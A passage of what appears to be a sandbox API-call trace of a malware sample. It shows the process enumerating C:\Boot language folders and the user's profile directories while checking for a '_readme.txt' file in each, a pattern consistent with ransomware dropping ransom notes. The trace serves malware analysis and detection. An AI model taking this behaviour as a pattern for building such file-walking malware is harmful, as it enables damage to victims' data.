returned="Boot\\" [0146.589] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.589] PathFindFileNameW (pszPath="") returned="" [0146.590] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.590] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.590] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.590] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.590] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.590] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328ec10 [0146.590] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.590] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.590] PathAppendW (in: pszPath="C:\\Boot\\tr-TR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0146.590] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.590] PathFileExistsW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0146.592] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.592] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.592] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.592] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec76650, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.592] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec76650, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.592] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.592] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.592] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.592] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.592] PathFindFileNameW (pszPath="C:\\Boot\\zh-CN\\") returned="zh-CN\\" [0146.592] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.592] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.592] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.592] PathFindFileNameW (pszPath="") returned="" [0146.592] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.592] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.593] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.593] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.593] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.593] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328f498 [0146.593] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.593] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.593] PathAppendW (in: pszPath="C:\\Boot\\zh-CN\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0146.593] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.593] PathFileExistsW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0146.593] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec9c7b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec9c7b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.594] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec9c7b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec9c7b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.594] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.594] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec9c7b0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec9c7b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec9c7b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.594] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec9c7b0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec9c7b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec9c7b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.594] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.594] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.594] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.594] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.594] PathFindFileNameW (pszPath="C:\\Boot\\zh-HK\\") returned="zh-HK\\" [0146.594] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.594] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.594] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.594] PathFindFileNameW (pszPath="") returned="" [0146.594] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.594] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.595] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.595] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.595] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.595] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328ec10 [0146.595] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.595] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.595] PathAppendW (in: pszPath="C:\\Boot\\zh-HK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0146.595] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.595] PathFileExistsW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0146.600] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.600] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.600] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.600] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ecc2910, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.600] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ecc2910, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.600] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.600] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.600] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.600] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.600] PathFindFileNameW (pszPath="C:\\Boot\\zh-TW\\") returned="zh-TW\\" [0146.600] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.600] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.600] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.600] PathFindFileNameW (pszPath="") returned="" [0146.600] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.600] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.601] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.601] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.601] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.601] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328f498 [0146.601] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.601] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.601] PathAppendW (in: pszPath="C:\\Boot\\zh-TW\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0146.601] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.601] PathFileExistsW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0146.601] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.601] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.601] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.601] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ecc2910, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.602] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ecc2910, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.602] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.602] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.602] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.602] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.602] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.602] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e660 [0146.602] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.602] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.602] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.602] PathFindFileNameW (pszPath="") returned="" [0146.602] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.602] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.602] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.602] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.602] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.602] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328ec10 [0146.602] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.602] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.603] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", pMore="_readme.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0146.603] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.603] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0146.607] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1ece8a70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ece8a70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.608] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1ece8a70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ece8a70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.608] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0146.608] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f000 [0146.608] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322efa8 [0146.608] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1c) returned 0x32408c0 [0146.608] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322ef50 [0146.608] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0146.608] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bbdd0 [0146.608] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bbea0 [0146.608] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x38) returned 0x3220d98 [0146.608] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f000 [0146.608] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1ffcd910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ffcd910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0146.608] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322ef50 [0146.608] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322efa8 [0146.608] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x54) returned 0x3216cb0 [0146.608] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322eef8 [0146.608] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bbdd0 [0146.608] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0146.608] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322ef50 [0146.608] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322efa8 [0146.608] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x70) returned 0x31f3c20 [0146.608] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f108 [0146.608] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bbe38 [0146.608] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f160 [0146.608] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2035fa10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x2035fa10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0146.608] RtlAllocateHeap 